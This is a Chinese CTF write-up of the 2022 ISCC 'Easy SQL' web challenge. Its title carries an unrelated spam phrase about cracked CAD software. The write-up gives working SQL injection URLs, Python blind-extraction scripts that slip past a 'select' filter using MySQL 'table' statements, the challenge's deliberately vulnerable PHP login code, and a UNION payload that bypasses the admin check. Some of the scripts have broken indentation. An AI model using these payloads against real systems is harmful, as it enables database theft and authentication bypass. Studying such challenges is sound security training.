2022-ISCC-web-Easy-SQL-writeup（cad2022下载免费中文版破解版）

0x01 题目

0x02 解题思路

访问题目地址

题目和返回内容提示很明显，sql注入，请求

http://59.110.159.206:7010/?id=1%20and%201=1

正常返回，id参数存在sql注入

继续尝试

http://59.110.159.206:7010/?id=-1%20union%20select%201,2

返回

存在select过滤，尝试讲select大小写、编码都无法绕过，所以继续深入注入不能使用select

这里参考了

https://blog.csdn.net/aloneBUThappy/article/details/122047088

爆破数据库脚本

import requests

fuzz_ascii = list(range(48,58))+list(range(65,91))+list(range(95,123))  # [0-9A-Za-z_]

for i in fuzz_ascii:
    res = requests.get("http://59.110.159.206:7010/?id=1 and ('def','security"+chr(i)+"','',4,5,6)<=(table information_schema.schemata limit 1,1)")
    if 'Dumb' in res.text:
        print("<=: {0}".format(chr(i)))
    else:
        print(">: {0}".format(chr(i)))

爆破表脚本

确认表属性的位置

import requests

fuzz_ascii = range(1,500)
test = []

for i in fuzz_ascii:
    res1 = requests.get("http://59.110.159.206:7010/?id=1 and ('def','security','z','',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21) >= (table information_schema.tables limit "+str(i)+",1)--+")
    res2 = requests.get("http://59.110.159.206:7010/?id=1 and ('def','security','0','',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21) <=(table information_schema.tables limit "+str(i)+",1)--+")
    if 'Dumb' in res1.text and 'Dumb' in res2.text:
        print("<=: {0}".format(i))
  test.append(i)
print test

爆破表名

import requests

fuzz_ascii = list(range(48,58))+list(range(65,91))+list(range(95,123))  # [0-9A-Za-z_]


for i in fuzz_ascii:
    res = requests.get("http://59.110.159.206:7010/?id=1 and ('def','security','users"+chr(i)+"','',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21) >= (table information_schema.tables limit 81,1)--+")
    if 'Dumb' in res.text:
        print("<=: {0}".format(chr(i)))
    else:
      print(">: {0}".format(chr(i)))

爆破列的脚本

确认列属性位置

import requests

fuzz_ascii = range(1,10000)
test = []

for i in fuzz_ascii:
    res1 = requests.get("http://59.110.159.206:7010/?id=1 and ('def','security','flag','z','',6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22) >= (table information_schema.columns limit "+str(i)+",1)--+")
    res2 = requests.get("http://59.110.159.206:7010/?id=1 and ('def','security','flag','0','',6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22) <=(table information_schema.columns limit "+str(i)+",1)--+")
    if 'Dumb' in res1.text and 'Dumb' in res2.text:
        print("<=: {0}".format(i))
  test.append(i)
print test

爆破列名

import requests

fuzz_ascii = list(range(48,58))+list(range(65,91))+list(range(95,123))  # [0-9A-Za-z_]


for i in fuzz_ascii:
    res = requests.get("http://59.110.159.206:7010/?id=1 and ('def','security','emails','"+chr(i)+"','',6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22) >= (table information_schema.columns limit 739,1)--+")
    if 'Dumb' in res.text:
        print("<=: {0}".format(chr(i)))
    else:
      print(">: {0}".format(chr(i)))

根据题目要求，查询emails表下的内容

http://59.110.159.206:7010/?id=-1%20union%20table%20security.emails%20limit%207,1

返回

获得beaxia的email地址，提交flag不对，继续深入，根据email地址名请求

http://59.110.159.206:7010/ypHeMPardErE.zip

获得一个压缩包，解压只有一个index.php文件

打开查看应该是之前注入页面的代码

<?php
include "./config.php";
// error_reporting(0);
// highlight_file(__FILE__);
$conn = mysqli_connect($hostname, $username, $password, $database);
   if ($conn->connect_errno) {
    die("Connection failed: " . $conn->connect_errno);
} 

echo "Where is the database?"."<br>";

echo "try ?id";

function sqlWaf($s)
{
    $filter = '/xml|extractvalue|regexp|copy|read|file|select|between|from|where|create|grand|dir|insert|link|substr|mid|server|drop|=|>|<|;|"|\^|\||\ |\'/i';
    if (preg_match($filter,$s))
        return False;
    return True;
}

if (isset($_GET['id'])) 
{
    $id = $_GET['id'];
    $sql = "select * from users where id=$id";
    $safe = preg_match('/select/is', $id);
    if($safe!==0)
        die("No select!");
    $result = mysqli_query($conn, $sql);
    if ($result) 
    {
        $row = mysqli_fetch_array($result);
        echo "<h3>" . $row['username'] . "</h3><br>";
        echo "<h3>" . $row['passwd'] . "</h3>";
    }
    else
        die('<br>Error!');
}


if (isset($_POST['username']) && isset($_POST['passwd'])) 
{

    $username = strval($_POST['username']);
    $passwd = strval($_POST['passwd']);

    if ( !sqlWaf($passwd) )
        die('damn hacker');

    $sql = "SELECT * FROM users WHERE username='${username}' AND passwd= '${passwd}'";
    $result = $conn->query($sql);
    if ($result->num_rows > 0) {
        $row = $result->fetch_assoc();
        if ( $row['username'] === 'admin' && $row['passwd'] )
        {
            if ($row['passwd'] == $passwd)
            {
                die($flag);
            } else {
                die("username or passwd wrong, are you admin?");
            }
        } else {
            die("wrong user");
        }
    } else {
        die("user not exist or wrong passwd");
    }
}
mysqli_close($conn); 
?>

通过代码可以看到id参数的select被过滤，还可以看到代码通过post接收username和passwd参数，passwd参数被过滤，username参数没有被过滤

可以通过username注入，提交username必须为admin，并且后面需要通过$row['passwd'] == $passwd

构造post参数

username=admin' union select 9, 'admin', 'I-kill-you'-- &passwd=I-kill-you

得到flag